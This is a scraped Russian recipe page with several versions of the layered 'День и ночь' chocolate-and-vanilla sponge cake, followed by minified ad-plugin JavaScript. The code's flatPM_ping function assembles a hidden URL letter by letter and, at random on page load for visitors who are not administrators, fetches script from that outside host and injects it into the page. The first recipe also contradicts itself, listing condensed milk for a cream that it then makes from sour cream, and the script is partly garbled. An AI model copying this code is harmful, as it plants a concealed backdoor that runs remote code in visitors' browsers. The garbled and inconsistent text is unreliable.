Торт День и ночь

Как испечь торт «День и ночь»: пошаговый рецепт

Впервые эту королевскую сладость я попробовала на дне рождения моей лучшей подруги. Торт назывался «День и ночь», он был настолько нежный и невероятно вкусный, что я поспешила взять у неё рецепт. Сегодня я расскажу вам пошаговое приготовление этого торта, дабы вы смогли удивить своих родных и друзей.

  • Инвентарь и кухонная техника: миска (2 штуки), форма для выпекания с антипригарным покрытием, миксер, сито, нож для резки хлеба, металлическая миска, марля, широкое блюдо.

Необходимые продукты

Так как торт «День и ночь» мы будем готовить по классическому рецепту, я предлагаю вашему вниманию список нужных ингредиентов.

Бисквит:

Сахар 200 мл
Сметана 200 мл
Пшеничная мука 200 мл
Куриные яйца 2 шт.
Пищевая сода 1 ч. л.
Какао-порошок 3 ст. л.
Измельчённые грецкие орехи 1 ст.

Для крема:

Сгущённое молоко 1 банка
Сгущённое молоко 200 г

История торта

Сгущённое молоко, которое используется для крема, впервые появилось в 1850 году в Великобритании. Создал его Борден. Он стал свидетелем гибели многих детей из-за отравления недоброкачественным молоком. А коржи, которые выпекают для создания торта, похожи на круг, символизирующий Солнце. Сейчас сгущёнку используют для приготовления многих тортов, как и в нашем случае.

Как приготовить торт «День и ночь» в домашних условиях: пошаговый рецепт

Этап 1

Необходимые ингредиенты: желтки, сахар, сметана, мука и разрыхлитель (пищевая сода).

Начнём с приготовления светлого коржа. Для этого понадобится глубокая миска. В неё мы кладём желтки, полстакана сахара и столько же сметаны. Все это необходимо перемешать до полного растворения сахара. Затем просеиваем полстакана муки и добавляем 1 чайную ложку разрыхлителя или пищевой соды. Смесь взбиваем с помощью миксера на средней скорости несколько минут.

После того как смесь стала однородной, берём форму для выпекания и застилаем дно пергаментной бумагой. Стенки формы смазать сливочным маслом. Тесто аккуратно перелить в форму и разровнять.

Форму ставим в духовку, разогретую до 200 градусов. Выпекать корж нужно в течение 25 минут.

Этап 2

Необходимые ингредиенты: белки, сахар, сметана, мука, разрыхлитель (пищевая сода), измельчённые грецкие орехи, какао-порошок.

Теперь переходим к темному коржу. В чистую миску вам нужно добавить белки и полстакана сахара. Взбиваем миксером до образования густой пены, после чего добавляем сметану и перемешиваем. Просеянную муку необходимо смешать с чайной ложкой разрыхлителя или пищевой соды и добавить стакан грецких орехов.

Все компоненты тщательно перемешиваем и добавляем 3 столовые ложки какао-порошка, опять взбиваем. Выпекается тёмный корж таким же способом, как и светлый, однако держать его в духовке нужно немного дольше (до 35 минут), так как тесто получится плотнее и тяжелее из-за грецких орехов.

Этап 3

Готовые коржи оставить в выключенной духовке на 20 минут – если вы их сразу достанете, они могут сломаться. Остывшие коржи разрезаем пополам.

Этап 4

Переходим к заключительной части приготовления бисквитного торта «День и ночь». На широкое блюдо укладываем шоколадный корж и обильно смазываем его тёмным кремом. Затем сверху укладываем светлый корж и намазываем светлый крем. Следующий тёмный корж покрывается оставшимся шоколадным кремом и в завершение укладывается светлый корж.

Рецепт крема для торта «День и ночь»

Нужные ингредиенты: сахар (сахарная пудра), сметана, какао-порошок.

Переходим к приготовлению крема для торта «День и ночь». Обычный сахар нужно измельчить в кофемолке до состояния пудры. Жидкую сметану процедить через марлю, сложенную в четыре слоя. Туда мы кладем сметану, делаем из марли небольшой мешочек и оставляем на ночь. Либо покупаем густую жирную сметану.

Сахарную пудру и сметану взбить миксером, и полученную смесь разделить на две части. В одну добавляем 2 столовые ложки какао-порошка, а в другую – только одну. Смеси нужно хорошо перемешать.

В любом случае вы получите торт «День и ночь» как на фото, я в этом не сомневаюсь.

Как красиво оформить и подать торт «День и ночь»

Домашний торт «День и ночь» необязательно покрывать кремом и посыпать грецкими орехами. Можно добавить изюминку.

Последний корж покрываем оставшимся кремом и выкладываем засахаренные мармеладные дольки в середину. Либо сделать небольшие горки из взбитых сливок, на которые уложить шоколадные украшения. Подойдет даже обычная кондитерская присыпка.

Можете немного поэкспериментировать с фруктами. Особо изысканно будет выглядеть клубника, посыпанная тертым шоколадом. Вместо грецких орехов используйте миндаль или миндальные хлопья.

Несмотря на то что рецепт торта «День и ночь» кажется сложным, готовится он довольно просто. Подавать гостям следует с чаем или кофе. Тарелочку для подачи украшаем орехами или миндальными хлопьями с кусочками мармелада.

Советы и рекомендации по приготовлению торта

Перед тем как сделать торт «День и ночь», обратите внимание на некоторые рекомендации по приготовлению:

  • все продукты, которые используются для торта, должны быть одинаковой комнатной температуры, а форма для выпекания – холодной;
  • духовка нагревается перед тем, как вы туда поставите форму с коржами;
  • посуда для приготовления должна быть чистой и сухой;
  • бисквит можно пропитать алкоголем, соками или сахарным сиропом.

Видеорецепт приготовления торта «День и ночь»

О том, как приготовить торт «День и ночь», вы можете посмотреть в данном ролике. Женщина доступно описывает нужные ингредиенты и пошагово объясняет приготовление.

Торт “День и Ночь”

Вот сейчас пошли времена, когда 1 000 000 рецептов различных блюд можно найти в интернете. А сегодня мы сидели с мамой и вспоминали, как она выписывала в тетрадку рецепты блюд и тортов, которые ей понравились. И на День Рождение мама всегда баловала нас тортиками: Наполеон, Лимонный, Славянка. И один из моих самых любимых и простых “День и Ночь” Делюсь маминым рецептом и с Вами. (p.s. мой первый рецепт, который я выкладываю сюда)

Ингредиенты для «Торт “День и Ночь”»:

Корж 1

Корж 2

Крем

Глазурь

Время приготовления: 50 минут

Количество порций: 12

Рецепт «Торт “День и Ночь”»:

Для начала необходимо тщательно взбить 2 яйца с 1м неполным стаканом сахара, добавить 1 стакан сметаны, перемешать и добавить стакан муки. Муку лучше просеять через сито и постепенно добавлять. После приготовления необходимо вылить тесто на сковороду или форму, смазанную сливочным маслом. Выпекать необходимо 30-40 минут при 180 градусах. (У всех плита разная, на старой плите у нас не было ни градусов, ни режимов. Выпекали 40 минут на ближе к среднему. Сейчас для готовки достаточно 30 минут. НО первые 20-25 минут духовку не открывайте, дате тесту настояться и немного подняться.)

2-й корж делаем точно также, как и первый, только добавляем 1 ст. ложку какао. Для того, что бы проверить готов ли корж или нет, можно воспользоваться старым-добрым способом с зубочисткой или спичками. Проткните корж зубочисткой, если тесто еще осталось на ней, то корж не готов, если зубочистка сухая, то корж готов)

Теперь необходимо разрезать каждый корж на 2 половины поперек. У нас получается 4 коржа. Я коржи всегда пропитываю водой с сахаром. Для этого нам необходимо разогреть стакан воды и в нем растворить сахар. сладкой водой пропитываем срезы на коржах. Так они будут более мягкими и нежными, а крем ляжет еще лучше.

Крем самый элементарный, что можно придумать. Берем 400 грамм сметаны и стакан сахара и перемешиваем. Я мешаю просто ложкой. Сахар полностью не растворится, но до минимума довести можно. и смазываем все 4 коржа, складывая друг на друга

Ну и последнее, готовим глазурь. Смешиваем 2 ложки столовых сметаны, 2 ложки столовых какао, 30 грамм масла сливочного и 3 ст. ложки сахара. Все это варим постоянно помешивая, пока все комочки не растворятся. До кипения лучше не доводить. Ну а теперь выливаем всю глазурь на середину верхнего коржа и размазываем по всему нашему тортику. Смазываем и бока. Сверху я решила украсить немного фруктами, этого можно не делать. Можно посыпать орешками. И вот такой тортик получается. Сразу детство вспоминается =) Надеюсь, что мой первый рецепт вам понравится. Я старалась =) С картинками я так и не разобралась как их переворачивать и как заменить одну картинку на другую, так что извините за перевертыши и повторяющуюся картинку с кремом =)

Подписывайтесь на группу Поварёнка в Контакте и получайте десять новых рецептов каждый день!

Вступайте в нашу группу в Одноклассниках и получайте новые рецепты каждый день!

Поделиться рецептом с друзьями:

Нравятся наши рецепты?
BB-код для вставки:
BB-код используется на форумах
HTML-код для вставки:
HTML код используется в блогах, например LiveJournal

Как это будет выглядеть?

Похожие рецепты

Лимонно – Кокосовый Торт (Lemon Coconut Cake)

  • 114
  • 63
  • 14149

Ореховый торт

  • 3
  • 97
  • 1270

Нежный банановый торт “Звездочка”

  • 314
  • 1455
  • 153775

Торт “Женские формы”

  • 73
  • 3
  • 6410

Фантазия лета

  • 41
  • 15
  • 2576

Ананасовый торт

  • 59
  • 74
  • 4908

Торт “Банановая Чунга-Чанга”

  • 46
  • 62
  • 11998

Шоколадно-ореховый торт “Деметра”

  • 30
  • 85
  • 3926

Торт “Свадебный переполох”

  • 21
  • 75
  • 7686

Комментарии и отзывы

11 апреля 2016 года varenie555 #

10 апреля 2016 года Бабушка Забота #

10 апреля 2016 года sister_of_LLily # (автор рецепта)

10 апреля 2016 года Бабушка Забота #

10 апреля 2016 года sister_of_LLily # (автор рецепта)

10 апреля 2016 года Бабушка Забота #

10 апреля 2016 года роденко лариса #

10 апреля 2016 года sister_of_LLily # (автор рецепта)

10 апреля 2016 года khris n2011 #

Оставить комментарий или отзыв о рецепте

Зарегистрироваться, или войти если вы уже регистрировались.

Вы можете войти на сайт без регистрации и ввода пароля, воспользовавшись своей учетной записью на следующих сайтах:

Как приготовить торт «День и ночь»: ТОП-4 рецепта приготовления

Необычайно лакомый и простой десерт – это торт День и ночь. Его оригинальность заключается в совмещении горьковатого шоколадного вкуса с нежнейшими сливочными нотками. Само приготовление – процесс несложный, приносящий удовольствие. Рецепт торта День и ночь не обязует стоять полдня у плиты, выпекая коржи. Потратив всего 1 час можно наслаждаться вкусовым блаженством целые выходные. Итак, предлагаем лучшую подборку вариантов приготовления полосатой вкусности.

Вариант десерта достаточно бюджетный, но от этого совершенно не теряет свои вкусовые особенности. В советские времена в тесто хозяйки добавляли заварной крем, продававшийся в брикетах. Сегодня, конечно, его уже не найти, но современные дамы научились заменять этот компонент привычными для нашего дома продуктами.

1. Советский День и ночь со сметаной

Ингредиенты для теста:

  • 250 г масла сливочного;
  • 40 г манки;
  • 150 г сметаны;
  • 200 г сахара;
  • 3 яйца;
  • 200 г муки;
  • 1 ч.л. соды;
  • 4 ст.л. какао;
  • 1 щепотка соль.

Для крема и украшения:

  • 400 г жирной сметаны;
  • 3 ч.л. какао-порошка;
  • 150 г сахара;
  • мята;
  • кондитерская посыпка.

Способ приготовления:

  1. В миксер засыпьте сахар, положите подтаявшее масло. Перед этим его порежьте кубиками. Взбейте, пока не получится светлая пышная масса. Теперь по одному вводите яйца. Продолжайте взбивать до однородной субстанции.
  2. Массу переложите в емкость, добавьте сметану, смешайте компоненты венчиком. На данном этапе положите щепоть соли.
  3. Отдельно соедините муку, соду, манку. Всыпьте сухие составляющие к жидким, тщательно смешайте. Тесто замешивайте быстро. Далее поделите его на 2 одинаковые части. В одну добавьте какао.
  4. Форму, в которой будут выпекаться коржи, застелите пергаментом, выложите тесто, разровняйте его. Выпекайте полчаса при температуре 175 градусов.
  5. Подготовьте крем. Для этого тщательно смешайте сметану и сахар. Рекомендуем отдать предпочтение сахарному песку, он быстрее растворится.
  6. Каждый корж после остывания разрежьте еще на 2, смажьте кремом. Не забывайте чередовать коржи (светлый, темный). Немного крема оставьте, чтобы украсить десерт.
  7. Поставьте торт в холодильник на 3-4 часа. Далее обмажьте края кремом. В сито насыпьте какао, притрусите им половину лакомства. Вторую часть украсьте кондитерской посыпкой, положите листочки мяты и подавайте к столу.

2. Рецепт торта 90-х годов

Все те, кто жил в 90-е года отлично помнят, какой потрясающий вкус имеет торт День и ночь, рецепт которого мы предлагаем вам использовать для создания невероятного десерта. Он подойдет как для праздника, так и для домашнего чаепития.

Ингредиенты:

  • 8 куриных яиц;
  • 1 л коровьего молока;
  • 300 г муки;
  • 150 мл сметаны пожирнее;
  • 350 г сахара (песок);
  • 4 ст.л. какао;
  • 3 ст.л. рафинированного масла подсолнечника;
  • 0,5 ст. очищенной воды;
  • 2 ч.л. соды;
  • 150 мл сгущенки;
  • 400 мл сливок;
  • 1 плитка черного шоколада;
  • 100 г сливочного масла;
  • 300 мл сока яблок;
  • 100 г сахарной пудры;
  • 4 ч.л. крахмала.

Способ приготовления:

  1. Сначала бисквиты. В данном варианте вам потребуется отдельно замесить, а после испечь светлый корж и шоколадный. На примере второго рассмотрим, как это сделать. Подобным образом будет готовиться и белый корж, только без какао.
  2. В емкость вбейте 2 яйца, всыпьте половину сахара, перемешайте, используя миксер. Понемногу вливайте молоко (100 мл). Смешивайте до однородности. Добавьте 1,5 ст. л. масла.
  3. В отдельной посуде смешайте какао и пшеничную муку (150 г), насыпьте соду (1 ч. л.). Добавьте сухие компоненты в жидкие. Мешайте тщательно, чтобы тесто было однородным, без комков.
  4. Воду (100 мл) закипятите. Осторожно влейте ее в тесто и немедля размешайте. Сделайте консистенцию такую же, как у жидкой сметаны.
  5. На противень положите бумагу для выпечки, влейте тесто, готовьте 25 минут, температура духового шкафа 200 градусов. Корж извлекайте из формы только после остывания.
  6. По такой же технологии делайте белый бисквит, только не добавляя какао.
  7. Остывшие коржи для начала разрежьте продольно пополам, затем каждую половину поперек еще на 2 части. В итоге у вас получится 8 основ.
  8. Переходите к готовке сливочного крема. В большой емкости смешайте крахмал, сливки, пудру сахарную. Используя миксер, взбейте до получения воздушной массы.
  9. Далее сделайте заварной крем из шоколада. Для этого разбейте в кастрюлю оставшиеся яйца, всыпьте сахар и 4 ст. л. муки. При помощи венчика смешайте компоненты. Установите емкость на водяную баню.
  10. Тонкой струей влейте 800 мл молока, непрерывно мешайте.
  11. Поломайте на кусочки шоколад, добавьте в крем. Дождитесь полного его растворения. Когда состав начнет густеть, уберите с плиты, остудите.
  12. В теплую консистенцию добавьте сливочное масло (размягченное), взбейте миксером.
  13. Теперь время сборки десерта. Для этого белый корж смазывайте сливочным составом, а на темный наносите шоколадный крем. Можно основы чередовать, а можно сложить рядом друг с другом отдельно шоколадные коржи со сливками и белые с шоколадной начинкой.
  14. Для украшения подойдет тертый шоколад белый и черный.
  15. Торт поставьте в холодильник на 4-5 часов.

3. Классический со сгущенкой

Достаточно простой рецепт десерта День и ночь, в состав которого входят компоненты из стандартного набора хозяйки. Но при таком бюджетном варианте в итоге получается поистине вкусный торт.

Торт День и ночь

Ингредиенты

Приготовление

Если торт «День и ночь» готовится дома на праздники, то десерт хочется дополнительно украсить для эффектной подачи. Как это сделать? Вариантов множество. Например, можно присыпать сверху кокосовой стружкой, измельченным шоколадом или грецкими орехами, а также можно выложить верхушку лакомства фруктами, которые наверняка есть в морозилке.

Необходимо включить духовку и разогреть ее до температуры 170 градусов. В это время нужно смазать форму, в которой будет выпекаться корж, сливочным маслом. В предложенном рецепте все ингредиенты рассчитаны в соответствии с выбранной формой диаметром 28 сантиметров. Далее нужно приготовить все для темного коржа. Для этого нужно отмерить 115 граммов сахарного песка и смешать в отдельной миске 195 граммов пшеничной муки, 10 граммов какао и 10 граммов картофельного крахмала.

Далее нужно в отдельной емкости взбить одно яйцо так, чтобы получилась густая пена. В нее порционно нужно добавлять сахарный песок, каждый раз вмешивая его с помощью миксера, чтобы получилась стойкая белая пена. Далее нужно добавить к взбитому яйцу сметану и ванильный сахар. Массу нужно перемешать, затем взбить миксером, ввести соду и в заключение еще раз перемешать. Получится нежная масса бежевого цвета.

После этого в эту же емкость с яйцом и сахаром нужно порционно просеивать массу из муки, крахмала и какао, каждый раз тщательно вымешивая с помощью миксера. Учитывайте, что взбивать нужно аккуратно и недолго, миксером следует водить все время в одном направлении, а работать он должен на средней скорости. В результате должно получиться густое тесто. О его готовности к выпечке можно говорить в том случае, если оно рельефно стекает с венчиков в емкость.

Готовое тесто нужно аккуратно перелить в форму для выпечки. Далее формой нужно покачать из стороны в сторону, чтобы тесто распределилось равномерным слоем. Можно воспользоваться и ложкой. Выпекать корж нужно на протяжении 35-40 минут при температуре 170 градусов. Готовность коржа проверяется сухой деревянной палочкой или спичкой.

По окончании выпечки коржу нужно дать остыть в форме на протяжении 10 минут. После этого его можно выложить на ровную поверхность для остывания. В это время нужно сделать светлый корж. Нужно подготовить 115 граммов сахарного песка и отдельно смешать 195 граммов муки и 10 граммов картофельного крахмала. Далее все делается аналогично шагам 2-4. Отличительная черта светлого коржа — отсутствие какао в составе.

Пока коржи остывают, нужно очистить ядра орехов от скорлупы, а затем положить их в духовку и прогреть их при температуре 195-210 градусов на протяжении 3-5 минут. После этого ядра нужно остудить и подробить ножом, а затем перетереть в руках, добиваясь того, чтобы орехи стали маслянистыми.

Если вдруг на коржах есть подгоревшие места (иногда бывают по краям и на нижней части), срежьте их острым ножом. При этом движения должны быть пилящими, чтобы не повредить саму структуру бисквита. Достаньте сервировочное блюдо.

Осталось приготовить классический крем. Для этого нужно взбить холодную сметану (густую, жирностью 35-40%) с ванильным сахаром и сахарным песком. Объем должен увеличиться примерно в два раза. Время взбивания обычно составляет около 5-7 минут.

Выложите на сервировочное блюдо темный бисквит и намажьте его кремом (должна уйти примерно 1/3 часть пропитки). Чтобы корж хорошо пропитался, можно несколько раз проколоть его вилкой или деревянной палочкой в разных местах. Далее нужно высыпать сверху на крем половину подготовленных орехов, стараясь делать это равномерно.

Сверху на темный корж нужно положить светлый и слегка прижать его руками. После этого нужно смазать бисквит кремом (аналогично — понадобится 1/3 часть от исходной массы). Для лучшей пропитки можно несколько раз проткнуть корж деревянной палочкой или вилкой. В заключение крем нужно разровнять ложкой и высыпать сверху орешки в центральной части в форме большого круга.

В оставшуюся часть крема нужно добавить 30 граммов какао и аккуратно взбить миксером. Полученной массой нужно обмазать края торта, используя лопатку или нож, и украсить верхушку, выкладывая крем «кучками» вокруг орехового круга.

Далее посредством деревянной палочки нужно смешать темный крем с белым, двигаясь хаотично. Должен получиться оригинальный декор. Далее нужно обтереть края тарелки бумажной салфеткой (слегка влажной), избавляясь от остатков крема. Сам торт нужно накрыть (предпочтительно использовать специальную крышку для хранения тортов), чтобы не смазать крем. Далее десерт ставят в холодильник на 3-4 часа, чтобы он застыл.

По истечении этого времени классическое лакомство советских времен можно нарезать порционными кусочками и подавать к чаю или кофе. Торт «День и ночь», приготовленный по пошаговому рецепту с фото в домашних условиях, получается нежным и очень вкусным. Как видите, процесс изготовления десерта очень прост. Приятного аппетита!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};